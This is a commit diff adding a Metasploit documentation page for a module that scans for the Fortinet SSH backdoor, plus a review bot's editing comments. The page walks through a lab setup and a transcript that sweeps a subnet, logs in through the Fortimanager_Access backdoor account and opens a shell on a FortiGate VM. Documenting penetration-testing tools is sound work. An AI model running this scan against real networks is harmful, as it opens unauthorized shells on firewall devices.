Add module doc

William Vu 1 year ago
parent
commit
a9d6845f25
1 changed files with 63 additions and 0 deletions
documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md (+63, -0)

@@ -0,0 +1,63 @@
1
+## Intro
2
+
3
+This module scans for the Fortinet SSH backdoor and creates sessions.
4
+
5
+## Setup
6
+
7
+1. `git clone https://github.com/nixawk/labs`
8
+2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
9
+3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
10
+
11
+## Usage
12
+
13
+```
14
+msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
15
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
16
+rhosts => 192.168.212.0/24
17
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
18
+threads => 100
19
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
20
+
21
+[*] Scanned  54 of 256 hosts (21% complete)
22
+[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
23
+[*] Scanned  65 of 256 hosts (25% complete)
24
+[*] Scanned  78 of 256 hosts (30% complete)
25
+[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
26
+[*] Scanned 104 of 256 hosts (40% complete)
27
+[*] Scanned 141 of 256 hosts (55% complete)
28
+[*] Scanned 154 of 256 hosts (60% complete)
29
+[*] Scanned 180 of 256 hosts (70% complete)
30
+[*] Scanned 205 of 256 hosts (80% complete)
31
+[*] Scanned 240 of 256 hosts (93% complete)
32
+[*] Scanned 256 of 256 hosts (100% complete)
33
+[*] Auxiliary module execution completed
34
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
35
+[*] Starting interaction with 1...
36
+
37
+FortiGate-VM # get system status
38
+Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
39
+Virus-DB: 16.00560(2012-10-19 08:31)
40
+Extended DB: 1.00000(2012-10-17 15:46)
41
+Extreme DB: 1.00000(2012-10-17 15:47)
42
+IPS-DB: 4.00345(2013-05-23 00:39)
43
+IPS-ETDB: 0.00000(2000-00-00 00:00)
44
+Serial-Number: FGVM00UNLICENSED
45
+Botnet DB: 1.00000(2012-05-28 22:51)
46
+License Status: Evaluation license expired
47
+Evaluation License Expires: Thu Jan 28 13:05:41 2016
48
+BIOS version: 04000002
49
+Log hard disk: Need format
50
+Hostname: FortiGate-VM
51
+Operation Mode: NAT
52
+Current virtual domain: root
53
+Max number of virtual domains: 10
54
+Virtual domains status: 1 in NAT mode, 0 in TP mode
55
+Virtual domain configuration: disable
56
+FIPS-CC mode: disable
57
+Current HA mode: standalone
58
+Branch point: 228
59
+Release Version Information: GA Patch 4
60
+System time: Wed Feb 21 13:13:43 2018
61
+
62
+FortiGate-VM #
63
+```
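
Review bot: Setup step 3 is a bare URL with no instruction, and it links FortiWeb documentation while step 2 imports a FortiGate VM; state what the reader must do at that step (presumably configure the VM's network interface so port 22 is reachable from the scanning host, which is an assumption on my part) and put the link inside that sentence. The Intro also gives no affected version range or advisory reference, although the sample output shows `FortiGate-VM v5.0,build0228,130809 (GA Patch 4)`; a line naming the affected builds would let a reader confirm the lab image matches and tell a defender which firmware to look for. Consider adding short verification-steps and options sections as well, since the Usage transcript is the only place `rhosts` and `threads` appear, and the `Fortimanager_Access` account in the login line is never explained.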
